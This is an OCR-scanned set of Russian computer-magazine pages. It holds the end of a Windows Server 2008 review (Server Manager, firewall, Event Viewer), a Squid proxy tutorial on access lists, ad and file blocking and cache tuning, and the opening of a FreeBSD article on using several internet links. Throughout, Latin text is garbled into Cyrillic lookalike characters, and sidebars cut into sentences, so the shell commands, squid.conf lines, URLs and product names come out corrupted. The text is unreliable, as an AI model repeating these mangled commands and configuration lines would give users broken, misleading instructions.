можно заметить, что, кроме ІРѵ4, по умолчанию поддерживается и 
ІРѵб. В серверной версии ОС от МісгозоЛ это применяется впервые. 
Выбрав настройку протокола, обнаружим еще одну вкладку — АкегпаГе 
СопІі^игаГіоп. Тут вводятся данные других сетей, к которым подключен 
сервер. Компонент Ілпк-Ьауег Тороіо^у Эізсоѵегу Маррег предназначен 
для поиска компьютеров и других устройств в сети, а включенный 
Кезропбег позволяет остальным узлам видеть этот компьютер. 
Существенно переработан Тазк Зскебиіег, ставший куда функциональ- 
нее. Теперь задачи можно привязать к установленным на сервере 
приложениям. 

ДИСПЕТЧЕР СЕРВЕРА5ЕКѴЕК МАЫАСЕК 

В «Панели Управления» также есть нововведения. Мастер, появляющий- 
ся при нажатии Абб Нагб\ѵаге, поможет установить драйвер для старых 
устройств, не поддерживающих Р-п-Р. В КеПѵогк апб 8Ііагіп§ СепГег опре- 
деляются использование общего доступа к каталогам, файлам и принте- 
рам, защита общих ресурсов паролем, видимость компьютера в сети. 
Знакомые инструменты из АбтіпізГгаГіѵе Тооіз подверглись пере- 
работке. Главное новшество — появление диспетчера серверов 
(Зегѵег Мапа^ег), который заменил целую группу утилит из СотриГег 
Мапа^етепГ в ѴѴіп2кЗ. Все настройки теперь собраны в одном месте и 
администратору не нужно их искать. Большая часть инструментов, дос- 
тупных в самом АбтіпізГгаГіѵе Тооіз, продублирована в Зегѵег Мапа^ег. 
Это полностью соответствует концепции ролей и компонентов, а также 
общему подходу к упрощению настроек. Диспетчер серверов способен 
управлять практически всеми компонентами сервера, влияющими на 
производительность и безопасность, а также просматривать инфор- 
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мацию об их работе. Он является единым источником, 
отображающим состояние сервера и определяющим про- 
блемы в настройке. Основное окно консоли Зегѵег Мапа§ег 
содержит четыре раздела: сводку по серверу (сведения о 
компьютере и безопасности), сводку по ролям, сводку по 
компонентам, а также материалы и поддержку. Здесь же 
доступны ссылки, позволяющие изменить состав ролей и 
компонентов или перейти к настройке параметров конкрет- 
ного модуля. 

После установки каждая роль получает собственную 
страницу в диспетчере. На странице предлагается набор 
рекомендованных настроек для данной роли и справка, 
указывающая пользователю на задачи, которые необходи- 
мо выполнить для корректной настройки функций роли. 
Всю важную информацию и команды диспетчер выводит в 
самом верху. Это удобно, потому что администратор всегда 
в курсе происходящего. Так как событий, относящихся 
к конкретной роли, — море, предусмотрены средства фильт- 
рации. Наличие событий, которые должны заинтересовать 
админа, подсвечивается значком в виде восклицательного 
знака, появляющимся напротив роли или компонента. 

При помощи ссылок, расположенных справа, администра- 
тор может получить доступ к тем системным настройкам, 
которые не относятся к ролям и компонентам (не обяза- 
тельно вызывать их из Асітіпізйгагіѵе Тооіз) . Отсюда можно 
настроить планировщик задач, сервисы, ѴѴМІ, пользователи 
и группы, работу межсетевого экрана, а также получить дос- 
туп к диспетчеру устройств. В отдельной вкладке ЗГога^е на- 
ходятся настройки, отвечающие за работу систем хранения 
информации: ѴѴіпсІоѵѵз Зегѵег Васкир и Эізк Мапа^етепі:. 
Консоль последнего позволяет быстро перейти к настрой- 
кам (ЗЬасІоѵѵ Сору, квоты и прочее) и проверкам дисков 
системы без необходимости вызова окна «Мой Компьютер». 

МЕЖСЕТЕВОЙ ЭКРАН 

Отдельно отметим межсетевой экран, встроенный в 
ѴѴіп2к8. Это совершенно новый продукт. Теперь правила 
можно задавать как для входящего, так и исходящего 
трафика. В настройках по умолчанию входящие соеди- 
нения запрещены, а исходящие — разрешены. Основные 
настройки ѴѴіпбоѵѵз Рігеѵѵаіі производятся из Зегѵег 
Мапа§ег или из одноименного пункта в Асітіпізітагіѵе 
Тооіз. Предварительные установки доступны и в Іппіаі 
Сопбі^игагіоп Тазк. Для редактирования доступно три про- 
филя — доменный (Эотаіп), пользовательский (РгіѵаНе) 
и общий (РиЫіс). Мастер, запускающийся при создании 




нового правила, поможет задать приложение, порт, 
протокол, интерфейс, а также пользователей и компью- 
теры. Отдельно указывается профиль для защищенного 
соединения ІРЗес. Фильтры позволяют быстро отобрать 
правила, удовлетворяющие определенным условиям для 
просмотра и редактирования. Созданные рулесеты можно 
экспортировать. 

СМОТРИТЕЛЬ ЖУРНАЛОВ 

С просмотра журнальных записей начинают свой рабочий 
день все администраторы. Еѵепі: Ѵіеѵѵег, доступный в 
«длиннороге», подвергся существенным изменениям. Он 
позволяет получить статистику по событиям любого вида. 
Его можно вызвать и как отдельное приложение, и через 
Зегѵег Мапа^ег. Выполнен он в едином для \Ѵіп2к8 стиле 
и смутно напоминает систему мониторинга Місгозок 
Орегагіопз Мапа§ег. В окне Зшшпагу можно быстро 
просмотреть список источников, генерирующих события 
определенной критичности. Сразу же отображается коли- 
чество подобных событий за час, сутки, неделю и общее. 
Количество журналов, представленных в Еѵепі: Ѵіеѵѵег, 
значительно больше, чем в предыдущих версиях. Для 
просмотра событий администратор может самостоятель- 
но создавать или импортировать изХМЬ-файлов наборы 
фильтров. Еще одно новшество — появление ЗиЪзсгірГіопз. 
Активировав ѴѴіпсІоѵѵз Еѵепі: СоІІесФг Зегѵісе, можно ука- 
зать, с каких компьютеров какие события нужно получать, 
а также место их хранения. Щелкнув по конкретному собы- 
тию, можно просмотреть более подробную информацию. В 
принципе, для сетей, где не используются другие средства 
мониторинга, возможностей Еѵепі: Ѵіеѵѵег должно хватить. 
Но есть еще одна особенность, привлекающая внимание, 
— а именно настройка реакции на конкретное событие. 
Достаточно отметить интересующее событие и в контекс- 
тном меню выбрать пункт «АпасЬ. ТазкТо ТЫз Еѵепі:», как 
сразу откроется окно мастера СгеаГе Вазіс Тазк ѴѴігагсі, где 
в качестве реакции можно настроить: отправку на е-таіі, 
вывод сообщения и запуск внешней программы. 

АКЦЕНТЫ ПОМЕНЯЛИСЬ 

Из обзора видно, что в \Ѵіп2к8 основные акценты сделаны 
на увеличение безопасности, на упрощение установки как 
самой ОС, так и сервисов, предоставляемых ей, а также 
на удобство последующих настроек. Будем надеяться, что 
«длиннорог» не будет содержать такого большого количест- 
ва ошибок, как предыдущие версии этой системы. П-Е 




> \ПІО 

• Используя утилиту 
ЗегѵегМападегСтсІ. 
ехе, можно устано- 
вить и удалить роли, 
службы ролей 

и компоненты. 

• Проверить количе- 
ство дней, остав- 
шихся до окончания 
текущего 60-тиднев- 
ного периода, мож- 
но, введя команду 
«зІтдг.ѵЬз — сііі». 

• Командой «зітдг. 
ѵЬз — геагт» сбра- 
сывается текущий 
пробный период, но 
делать это раньше, 
чем через 60 дней, 
не рекомендуется. 
Дождись окончания 
текущего! 

• Ксожалению (или 
к счастью], сущест- 
венных изменений 
в работе с файловой 
системой нет. 




> Ііпкз 

• Официальную 
информацию по 
І_опдЬогп можно 
получить по адресу: 
мѵѵѵѵ.тісгозой.согп/ 
ѵѵіпсІо\л/55егѵег2008 . 

• В статье 948472 от 
21 марта, которую ты 
можешь найти на сай- 
те Майкрософт, дана 
информация отом, как 
продлить оценочный 
период до 240 дней. 

• Обзор Веіа 3 читай 
на сайте ] [ — ѵѵллллл 
хакер.ги/роз1:/41325 . 
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Рецепты 
приготовления 

КАЛЬМАРА 



50Ш0: НАСТРАИВАЕМ КОНТРОЛЬДОСТУПАИ ОПТИМИЗИРУЕМ КЭШ 

Когда нужно предоставить совместный доступ к ѴѴеЪ-сервисам с возможно- 
стью кэширования трафика, в первую очередь вспоминают о кэширующем 
прокси-сервере Здиісі. Это гибкое решение применяют и в мелких офисах с 
несколькими пользователями, и в корпоративных сетях со сложной тополо- 
гией. Разберем, как настроить в Здиісі самые популярные функции — конт- 
роль доступа и работу с кэшем. 



УСТАНОВКАЗОІІШ 

Для новичков — пара слов о самом Здиісі. Здиісі, он же «кальмар» ( ѵѵѵуѵу. 
здиісІ-сасЬе.оіу) — приложение, позволяющее организовать прокси/кэ- 
ширующий сервер для НТТР, РТР и некоторых других популярных прото- 
колов. Поддерживается работа с защищенными ТЬЗ/ЗЗЬ соединениями, 
кэширование ЦКЗ, возможно использование Здиісі в качестве прозрачного 
или реверсного прокси. Распространяется по лицензии СРШ СРЬ. Работает 
во всех популярных вариантах Цпіх систем — СРШ/Ътих, *В5Ц, Мае 05 X, 
ЗипОЗ/ЗоІагіз. Есть версия для ѴѴіпсІо\ѵ5. 

В качестве примера буду использовать ЦЬипШ, но сказанное относится 
и к остальным дистрибутивам или ОС (со скидкой на особенности уста- 



новки в каждом конкретном случае) . Отметим, что сейчас параллельно 
развиваются две ветки: 2.x и 3.x. Третья ветка перешла в разряд ЗТАВЬЕ 
в конце прошлого года, и разработчики рекомендуют ее к использова- 
нию. В репозитарии ЦЬипШ 6.06 ЬТЗ Царрег Цгаке находится пакет с 
версией Здиісі 2.5, в последнем 7.10 — 2.6.14. Также в репозитариях всех 
ЦЬипШ, начиная с Резіу Ра\ѵп (7.04), есть и пакеты с третьей версией 
Здиісі. По описываемым в статье параметрам отличий у них практиче- 
ски нет. 

Установка кальмара в ЦЬипШ довольно проста: 

$ зисіо арЬ-деС іпзЬаІІ здиісі здиісі- с огппюп 
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Или, для Зциісі 3 : 

$ зисіо арб-деЬ іпзЬаІІ зсщісІЗ здиісіЗ-сотшоп 

После инсталляции Зциісі будет запоен с установками по 
умолчанию. При первом запуске возможна ошибка «ЕАТАЬ : 
Соиід. поѣ сіеѣептііпе Еиііу диаІіЕіед. Ііозѣпате . 
Ріеазе зеі: 'ѵізіЫе_Ьозѣ пате '». Это значит, что по 
дефолту разрешение имени узла, на котором работает Зциісі, 
осуществляется при помощи деіЪозІпате () .В зависи- 
мости от установок ЭК5 он иногда не может однозначно 
определить имя, которое будет фигурировать в журналах 
и выводах об ошибках «СепегаСеб ... Ъу зегѵег. сот 
( здиісі/ 3 . О . ЗТАВЬЕ2 ) », поэтому просит тебя помочь. Все 
настройки Зциісі производятся в единственном файле /еіс/ 
здиісі/ здиісі. сопР. В нем до невероятности много парамет- 
ров и бросаться менять их все и сразу не стоит. Просмотреть 
список параметров, убрав пустые и закомментированные 
строки, можно при помощи команды: 

$ зисіо дгер -ѵ " Л #" / еЬс/ здиісі/ здиісі. сопб I вес! 

-е '/ А $/й' 

Формат здиі 6. . сопЕ стандартен для Шіх. Каждая запись 
состоит из строк вида: «параметр значение». Строки, начи- 
нающиеся со знака решетки, — комментарии. Для удобства 
настройки все параметры разбиты по секциям. Разбиение 
чисто условно и свои параметры можно заносить в любое 
место файла. Возможно подключение внешнего файла с 
настройками при помощи іпсіисіе. Помни, что установки 
применяются в порядке очередности. 

Для начала запустим Зцшс1, устранив ошибку, указанную 
выше. Заносим в конфиг строку с именем сервера Зциісі (не- 
обязательно должно совпадать с доменным) : 

ѵізіЫе_Ъоз1:пате туздиісі 

И запускаем: 

$ зисіо /ебс/іпіЬ . сі/здиісі зЪагЬ 

В настройках по умолчанию сквид принимает входящие 
соединения на 3128Дср. Командой «пеЬзЬаЬ — апС / 
дгер 3128 » проверяем, слушается ли этот порт. Если 
все ОК, настраиваем веб-браузер для работы через 
прокси-сервер и выходим в Сеть. Но сейчас это возмож- 
но только с 1осаШо8(. Чтобы в интернет могли попасть 
остальные пользователи локальной сети, нужно устано- 
вить соответствующие разрешения, используя контроль 
доступа. 



уі'пгінздепѵг.смл! * -АЧійІ 
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Параметры по умолчанию в зриісі.соп? 



НАСТРАИВАЕМ ДОСТУП 

Изменив параметр Ъ.ѢСр_рогѣ, мы можем подвесить Зцшс! 
только на внутренний сетевой интерфейс: 




> ІП^О 

• Для и ісі существует 



ЬЬЪр_рогЬ 192.168.0.1:3128 

Чтобы разрешить всем пользователям сетей 192.168.0.0, 
172 . 16 . 0 . 0 и компьютера 192.168.1.1 подключаться к 
Зцшсі, добавляем описание нового списка доступа в секцию 

«АССЕЗЗ СОЫТКОЬ »: 



огромное количество 
дополнений (анализа- 
торы журналов, отчеты 
и другие), в репози- 
тариях большинства 
дистрибутивов есть 



самые популярные 

асі ІосаІпеЬ зге 192 . 168 .0.0/24 172 .16.0.0/12 из них. Для поиска в 
192.168.1.1 I) Ьи пІи введи «зисіо 



арѣ-сасііе зеагсЪ. 



Переменные чувствительны к регистру, но, применив 
параметр « асі -і», это можно исправить. Чуть дальше 
покажу, как. Если нужно настроить доступ не для всей сети, а 
для отдельных ее узлов, проще записать их адреса в файл (по 
одному в строке) , который и указать в качестве последнего 
параметра. Третья строка — тип списка доступа. В нашем 
случае используется зге (от зоигсе) . При помощи других пара- 
метров можно задать внешний адрес (сізі), МАС-адрес (агр), 
доменное имя (згеботаіп, бзМотаіп), порт (рогГ), протокол 
(ргоГо), время (гіте) и многое другое. Фактически, работало 
организации доступа сводится к описанию объекта в асі, а 
затем разрешению или запрету работы объекта при помощи 
Ь.йр_ассе55 с требуемыми параметрами. Например, чтобы 
указать рабочее время, применим такую конструкцию: 

асі Ж)гк_Ъ.оигз Ьіте МТИТ Г 9:00-18:00 

В описании используются первые буквы английского языка, 
соответствующие дням недели. В секции «АССЕЗЗ СОЫТРОЬ» 
уже описаны некоторые АСЬ, в частности, описываются 
номера некоторых портов (привожу не все) и АСЬ, соответст- 
вующий всем адресам: 

асі ЗЗЬ_рогЬз рогЬ 443 563 873 

асі Забе_рогЬз рогЬ 80 21 443 563 1025-65535 

асі аіі зге 0 . 0 . 0 . 0/0 . 0 . 0 . 0 

Следует внимательно просмотреть весь список и закоммен- 
тировать строки с портами ненужных или неиспользуемых 
сервисов. 



здиісі»- 



• После установки 
ЗциісІ в каталоге 
/изг/зЬаге/бос/ 
здиісі ты найдешь 
документацию и при- 
меры конфигурацион- 
ных файлов. 

• Для нарезания бан- 
неров можно дополни- 
тельно использовать 
прокси-сервер ЬШег 
[ ЬШег.зЬпеД или 
редиректор для зриісі 
— асігаррег ( аскаррег 
зЬпеі ). 

•Чтобы заставить 
ЗциісІ 2.6 работать в 
режиме прозрачного 
кэширующего прокси- 
сервера, в конфиге 
следует удалить все 
директивы Ъсір6_ 
ассе1_* и пропи- 
сать «Ыір _рогі 
127 .0 .0 .1:3128 
Ігапзрагепі» ■ 
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На сайте проекта сегодня доступны две версии ЗриісІ 




Когда списки составлены, при помощи параметра Ы ір_ассезз разре- 
шаем или запрещаем доступ указанному АСЬ. Общий формат вызова 
такой: 

ЬЬЬр_ассезз аііоѵ? I сіепу [ ! ] название_АСЬ 

Восклицательный знак инвертирует значение списка, то есть звучит, как 
«все кроме». По умолчанию используется правило: 

Ы:Рр_ассе88 сіепу аіі 

Его мы обязательно помещаем в конец списка рулесетов. В этом случае все 
соединения, которые не разрешены явно, будут блокированы. Майнтэй- 
неры, собирающие пакеты в дистрибутивах, как правило, добавляют и 
несколько своих правил. 

Чтобы разрешить подключение к Здиісі с указанных адресов и работу толь- 
ко с нужными портами, пишем: 

Ы:Рр_ассезз аііоѵ? ІосаІпеЪ 
Ы:Рр_ассезз сіепу !5аіе_рогЬз 
Ы:Рр_ассезз сіепу !ЗЗЬ_рогЬз 

Сохраняем результат и перезапускаем Бдиісі: 

$ зисіо /еЬс/іпіЬ .сі/зфіісі гезЬагЬ 

Проверяем. Если все нормально, идем дальше. Чтобы не перестраивать 
клиентские системы, проще использовать іріаЫез: 

ірСаЫез -Ь пар -А РЕЕКОЧТШС -і еРЫ \ 

-р Рср -ш Рср --«ЭрогР 80 -3 БЫАТ \ 

--Ро-сіезРіпаРіоп 192 . 168 .0.1: 3128 

ірРаЫез -Р пар -А РКЕКШТПТС -і еРЪО -р Рср -ш Рср \ 

— (ірогр 80 -3 КЕБІКЕСТ --Ро-рогРз 3128 

А вот еще один пример. Нам нужно, чтобы компьютеры с определенными 
ІР могли выходить в инет только в рабочее время. Без проблем: 

асі ѵгогкір зге 192.168.1.100 192.168.1.200- 
192.168.1.210 

ЬРРр_ассезз сіепу !ж>гк_]іоиг5 ж>гкір 



Можно разбить это правило на два, сделав более читабельным: 

ЬРРр_ассезз а11ом иогк_1юигз иогкір 
ЬРРр_ассезз сіепу могкір 

Первая строка разрешит доступ при совпадении двух АСЬ: рабочее время и 
ІР-адрес. Вторая запретит доступ всех записанных в АСЬ ѵѵогкір при несов- 
падении с первым правилом (то есть в другой временной промежуток) . 

РЕЖЕМ БАННЕРЫ И САЙТЫ 

Одна из функций, которая делает Здиісі востребованным, — запрет досту- 
па к определенным интернет ресурсам. Это реализовано на той же сладкой 
парочке: ас1иЫі:р_ассезз. Зная адрес ресурса, можно просто закрыть 
доступ к конкретному адресу или целой подсети : 

асі сіепупеЬ сізЬ 194.55.0.0/16 
ЬЬЬр_ассезз сіепу сіепу пеЬ 

Но вместо того, чтобы использовать адрес, удобнее при помощи сізГсіотаіп 
указывать домен назначения. Например, запретим доступ к сервисам 
вроде КарЫЗЬаге: 

асі гаріеіа сІзЬсІотаіп . гаріеізііаге . сот . гаріеізкаге . сіе 
ЬЬЬр_ассезз сіепу гаріеіа 

Если в сети есть юзеры, которым разрешено все (начальство не любит, 
когда их куда-то не пускают) , то запрещающее правило можно дополнить 
списком адресов: 

ЬЫ:р_ассез5 сіепу ѵюгкір сізксіотаіп 

Это самый простой способ, но далеко не самый удобный. Юзвери, не попав 
на любимый ресурс, быстро бросятся на поиск альтернативы и, естест- 
венно, ее найдут. Поэтому адреса в АСЬ удобнее задавать при помощи 
регулярных выражений: 

асі асіиІЬ <ізЬ<іот_гедех вех 

асі гедехсіотаіп сізЬсіот_гедех \ .сот$ \ .пеЬ$ \ .Ьѵ$ 
ЬЫ:р_ассез5 сіепу асіиІЬ гедехсіотаіп 

Сейчас мы запретили доступ ко всем все доменам, содержащим слово 
«зех», и всем доменам в зонах .сот, .пен и .Гѵ. 
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Аналогичным образом блокируется и определенный контент, но вместо 
(І5І;(іот_ге§ех используется иг1_гедех или иг1ра^Ь_гедех. С их 
помощью указывается шаблон регулярного выражения для ШИ.. Второй 
отличается тем, что не нужно заботиться о пути ШИ (при описании исклю- 
чается домен). Например, создадим описания расширений видео, флэш 
и музыкальных файлов и запретим обращение к таким ссылкам. В этом 
случае игіра 1 Ь_гедех подходит больше, но приведу оба варианта для 
примера. Чтобы игнорировался регистр символов, используем ключ - і : 

асі ѵісіеоіііез иг1_гедех — і *\.аѵі$ *\.шрд$ *\.шр4$ 

*\ • 5МЬ$ 

асі зоипсііііез иг1раЫі_гедех -і \ .шрЗ$ \ .аз!$ \ .ша$ 
ЬЬЪр_ассезз (Зепу ѵісіеоіііез зоипсИііез 

Кстати, для хранения ІЖЬ удобно использовать отдельный файл: 

асі Ыоскіііез иг1раЫі_гедех -і " /еЬс/зсзиісІ/Ыоскз . 

Іііез . асі " 

ЬЫ:р_ассезз сіепу Ыоскіііез 

Заносим в него данные о расширениях: 

$ зисіо пало /еІс/здиісІ/Ыоскз.Шез.асІ 

\ . ехе$ 

\ . аѵі$ 

\ -трд$ 

\ .шред$ 

\ .шрЗ$ 



асі асЗзепзе иг1_гедех — і *радеас!2* 

Ы:кр_ассезз (Іепу асЗзепзе 

Используя тип ргоно, можно указать один из протоколов (Ьнр или Кр), 
для которых будет действовать правило, или вообще запретить доступ по 
выбранному протоколу: 

асі ІЬр ргоЬо ІЬр 
Ы:1:р_ассе83 (Зепу ІЬр ѵ?огкір 

Теперь с компьютеров с адресами, входящими в ѵѵогкір, нельзя будет 
обратиться к РТР-ресурсам. Использование АСЬ для блокировки баннеров 
не очень удобно. Выходом будет фильтрация не по конкретному адресу, а 
по содержимому при помощи здиісіСиагсі (его настройку мы рассмотрим в 
следующем номере журнала) . 

НАСТРОЙКИ КЭША 

Борьба с баннерами — не единственная возможность сэкономить трафик. 
Нельзя обойти стороной настройку кэширования. В ЫЪііпШ кэш по умол- 
чанию размещается в каталоге /ѵаг / зрооі/ здиісі. В других дистрибути- 
вах может быть иначе. Чтобы не искать, посмотри значение переменной 
саске_6іг. Формат ее таков: 

сас1іе_(3іг Ьуре путь размер Ы Ь2 [орЬіопз] 

Например: 

сас3іе_(3іг иіз /ѵаг/зрооі/здиісі 10249 16 256 



При изменении содержимого этого файла следует перезапускать ЗдиісЬ 
Иногда полезно выводить информационную страничку, чтобы пользова- 
тель знал, что он пытается получить доступ к запрещенному ТЖЬ и его бло- 
кируют. Для этого используется параметр йепу_іпЕо, который находится 
в секции «ЕККОК. РАСЕ ОРТКЖ5». В качестве параметров следует передать 
файл или ЦКЬ, который будет выведен пользователю, и АСЬ, к которому 
относится данный д.епу_іп^о. Файл должен находиться в подкаталоге 
/еЬс / здиісі/ еггогз в формате НТМЬ. Кроме того, на каталог для 
сообщений об ошибках показывает переменная еггог_<ЗігесШгу (в ЫЬипШ 
/изг/зЬаге/здиісі/ еггогз /Епдіі зЪ ) . Добавляем в здиі < 3 . сопИ: 

(Зепу_іп1о ЕКЕ_ВЬОСКЕБ_РІЬЕЗ Ыоскіііез 

И создаем файл /еѣс/здиісі/ еггогз /ЕКК_ВЬ0СКЕП_РІЬЕЗ, где 

популярно расписываем причину блокировки. С помощью регексповых 
выражений можно блокировать и рекламу. Например, Соо§1е АбЗепзе и 
некоторые другие попадут под правило: 



Поле іуре определяет тип кэша: иЕз (ипіхШе зузііет), аиЕз и сЗізксЗ. 
Обычно используется іКз как наиболее надежный. Максимальный 
размер, после которого кэш будет очищаться, установлен по умолчанию 
в 100 Мб. При серьезных нагрузках он быстро заполнится, поэтому есть 
смысл увеличить его до нескольких гигабайт (мы увеличили до 10 Гб) . 
Удобно, что можно использовать несколько сасЪе_(3.іг, установив кэш 
на разных дисках, — положительно скажется на производительности. В 
Здиісі каждый кэшируемый объект располагается в отдельном файле, а 
сами файлы не сваливаются в одно место, благодаря механизму работы 
с двухуровневой иерархией каталогов. Количество каталогов первого и 
второго уровней определяют параметры Ы и Ь2. По умолчанию их зна- 
чения 16 и 256, соответственно. Дополнительно для каждого сасЬе_ 

(Зі г можно определить параметр геаб-опіу (только чтение) итах-зізе 
(максимальный размер объекта) . 

Максимальный размер объекта в кэше определяется переменной 
тахітит_оЬз есІ_зі хе. Значение по умолчанию — 4 Мб, есть смысл его 
увеличить: 
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> 1іпк5 

На странице уѵікг 
здиісІ-сасЬе. 
огд/СопЛдЕхатрІез 
доступны примеры 
настроекЗдиісі. 




> ѵѵагпіпд 

После изменения 
конфигурационных 
файлов не забывай 
перезапускать Бдиісі 



тахішиш_оЬзес1:_5І2;е 10240 КВ 

Аналогично, есть и параметр тіпітит_оЪз есЬ_зі хе, 
отвечает за минимальный размер объекта, по дефолту он 
отключен (значение 0) . Объем ОЗУ, используемый Зциісідля 
хранения обрабатываемых объектов, определяется парамет- 
ром сасЬе_тет (по умолчанию — 8 Мб) . При большом размере 
кэша лучше увеличить это значение, тем более что объемы со- 
временных ОЗУ это позволяют. Иначе Зцшсі будет сбрасывать 
всю информацию на диск, что замедлит его работу. 

Но это еще далеко не все. Например, отключенный по 
умолчанию параметр ге1оад_іпіо_ітз разрешает игно- 
рировать посасЪе или геіоад и выдавать объект из кэша. 
Это нарушение стандарта НТТР, но большинство серверов 
умеют корректно обрабатывать такой запрос, потому 
включаем: 



ге1оа<і_іп1:о_ітз оп 



Вместо глобальной установки можно задать такой параметр 
для некоторых типов файлов. 

Документация на странице ге1оад_іпі:о_ітз отсылает 
нас к не менее интересной директиве геИгезЪ_ра ѣ Ь егп, 
которая управляет параметрами кэширования: 

геігезіі_ра1:1:егп [-і] гедех гпіп регсепС шах 

[орЕіопз] 

В ге§ех пишем регулярное выражение, которому будет 
отвечать правило. Проверка производится до первого 
совпадения. Поэтому последним всегда устанавливается 
«.» — то есть правило для всех объектов. Параметр тіп и 
тах указывают на минимальное и максимальное время в 
минутах, в течение которого объект считается новым. В 
регсепИ указывается процент от времени последней моди- 
фикации объекта. В тіп рекомендуется устанавливать 0, 
чтобы корректно работать с динамически обновляемыми 
страницами. В версии Здиісі 2.x по умолчанию используют- 
ся инструкции: 



гебгезіираббегп 1440 20% 

гебгез1і_ра1:1:егп ^дорЪег : 1440 0% 

геІгезІираЪЕегп . 0 20% 



10080 

1440 

4320 



В версии 3.0 перед «.«добавлена строка: 



гебгез1і_ра1:Еегп (сді-Ьіп|\?) 0 0% 0 



В поле оргіопз через пробел указываются дополнительные 
параметры. В версии 2.x параметров семь, в 3.x добавилось 
еще два. Большинство из них идут в разрез со стандартами 
НТТР, и их использование может вызвать проблемы при рабо- 
те с некоторыми серверами. Однако они весьма полезны для 
оптимизации кэша и понадобятся в дальнейших настройках: 

• оѵеггісіе-ехріге — в нарушение стандарта заставляет 
игнорировать параметр ехріге, то есть время актуальности 
объекта; 

• оѵеггібе-іазіітосі — игнорирует время последней моди- 
фикации объекта, переданного сервером; 

• геіоасі-іпіо-ітз, і^поге-геіоасі — изменяет или игнориру- 
ет клиентские запросы посасЬе или геіоад. и принудитель- 
но выдает объект, хранящийся в кэше; 

• ідпоге-по-сасііе, і^поге-ргіѵаіе, і^поге-аиНі — игно- 
рирует заголовки «Ргадта : по-сасЪ.е», «Саске- сопі го 1 : 
по-сасЪ.е»,«СасЪ.е-сопЫо1 : ргіѵаі:е»и«Сас!іе- 



сопігоі : риЫіс», принудительно кэшируя такой объект. 
Параметры, появившиеся в третьей версии: 

• і&поге-по-зіоге — игнорировать заголовок «СасЬе- 
сопггоі: по-згоге»; 

• геітезіі-ітз — заставляет проверять наличие новой вер- 
сии файла при получении от клиента К-МосІШесІ-Зіпсе. 

В самом простом случае вместо правил по умолчанию можно 
написать одно правило, заставляющее принудительно кэши- 
ровать объекты на целый год: 

геігезЬ._раЬЬегп . 518400 80% 518400 

оѵеггісіе-ехріге оѵеггісЗе-ІазЕтосІ ге1оасі-іп1:о- 
ітз ідпоге-по-сасііе ідпоге-ргіѵа1:е ідпоге- 
аиСЪ. ідпоге-по-зЕоге 

Устанавливаем размер кэша побольше и забываем о Здиіб. 
Это даст весьма ощутимую экономию трафика. Но такой под- 
ход не всегда приемлем, да и кэш быстро заполнится старыми 
файлами. Поэтому лучше установить свои варианты кэширо- 
вания для разных типов файлов . Например, часто на сайтах 
проектов экзешники, архивы и некоторые другие типы фай- 
лов имеют постоянный адрес, вроде з егѵег . сот/сиггеп і: . 
ехе . Укажем для таких файлов время хранения в месяц: 

ге:ЕгезЬ._ра*:І:егп \ .ехе$ 43200 100% 43200 

оѵеггісіе-ехріге оѵеггісіе-ІазЕтосі геІоасі-іпСо- 
ітз ідпоге-по-сасііе ідпоге-ргіѵа!:е ідпоге- 
аиСЬ. ідпоге-по-з1:оге 

геігезЬ._ра1:1:егп \ .гір$ 43200 100% 43200 

оѵеггісіе-ехріге оѵеггісіе-ІазЬііосі геІоасІ-іпЪо- 
ішз ідпоге-по-сасііе ідпоге-ргіѵаЕе ідпоге- 
аиЫі ідпоге-по-зЕоге 

И так далее. Схожим образом «вырезаем» рекламу. Так как 
довольно трудно создать универсальное правило для асі/ 
1тр_ассе55 и всегда можно допустить ошибку, рекламу проще 
кэшировать, чем блокировать: 

ге^гезЬ._раЫ:егп Ы;Ьр: / /асі\ . 43200 

100% 43200 оѵеггісіе-ехріге оѵеггісіе-ІазЕшосі 

геІоасі-іпЪо-ішз ідпоге-по-сасііе ідпоге- 
ргіѵаЕе ідпоге-аиЕіі ідпоге-по-зЕоге 
геігезЬ._раЕ1:егп ЪЪЬр: //с1іск\ . 43200 
100% 43200 оѵеггісіе-ехріге оѵеггісіе-ІазЕшосі 

геІоасі-іпЪо-ішз ідпоге-по-сасііе ідпоге- 
ргіѵаЕе ідпоге-аиЕіі ідпоге-по-зЕоге 
геігезЬ._ра1:Ьегп Ы:Ср: //соипЬХ . 43200 
100% 43200 оѵеггісіе-ехріге оѵеггісіе-ІазЕшосі 

геІоасі-іпСо-ішз ідпоге-по-сасііе ідпоге- 
ргіѵаЬе ідпоге-аиЕіі ідпоге-по-зЕоге 

Это наиболее простой способ. При тщательном изучении 
логов можно составить коллекцию ІЖЬ, которые стоит 
поместить в вечный кэш. Для нарезания баннеров можно 
дополнительно использовать прокси-сервер ЪПІГег (ЪМіег. 
зТпеН или редиректор для здиісі — асігаррег Габгаррег. 
зТпеН . 

Как видишь, кальмар не так страшен. Если не считаешь 
удобной ручную настройку, обратись к ѴѴеЪтіп, где 
большинство установок можно произвести в наглядной 
форме. Базовая настройка занимает минут 10. После 
определенной доводки пользователи будут радоваться 
скорости открытия страниц, а руководство — низкому 
трафику. ПК! 



► ізб 
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Как два линка 
обуздать 

ДОБИВАЕМСЯ ЭФФЕКТИВНОЙ РАБОТЫ НЕСКОЛЬКИХ ИНТЕРНЕТ-КАНАЛОВ ВО РРЕЕВ50 

Если автомагистраль перестает справляться с возросшим потоком транс- 
порта, то проблема обычно решается строительством дополнительных по- 
лос. К счастью, ввести в эксплуатацию дополнительные «полосы» доступа в 
интернет гораздо проще, чем расширять проезжую часть. Но пакеты данных 
не столь разумны, как водители, так что об оптимальном заполнении всех 
имеющихся каналов придется заботиться самому. 



ВСЕ, ЧТО МОГУ... 

Сразу расставим точки над «ай» — есть вещи выше наших сил. Допус- 
тим, на твоем сервере работает АрасЬе, и если у какого-то далекого (или 
недалекого) клиента маршрут к нему ведет через твой интерфейс г 1 0 , то 



хоть тресни, а трафик будет идти через г 1 0 и никак иначе. Нуда, можно, 
конечно, вспомнить про автономные системы, протокол ВСР, граничные 
маршрутизаторы и прочие премудрости. Но, как ты думаешь, сколь- 
ко в мире найдется провайдеров, готовых бесплатно возиться с твоей 
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Если добавить опцию Іод в правила і рбѵѵ, в /ѵаг/іод/зесигііу можно увидеть много интересного 



маршрутизацией, если таких клиентов, как ты, у них тысячи? Так что 
сразу оговорюсь, что не буду рассматривать способы, требующие особого 
отношения со стороны провайдера, и покажу лишь то, что можно сделать 
самостоятельно, имея несколько «обычных» подключений. 

За основу возьму свою любимую РгееВЗЭ и пакетный фильтр ірбѵ;. Воз- 
можно, это не самый лучший вариант для построения шлюза с нескольки- 
ми внешними соединениями, зато рассмотренные принципы с высокой 
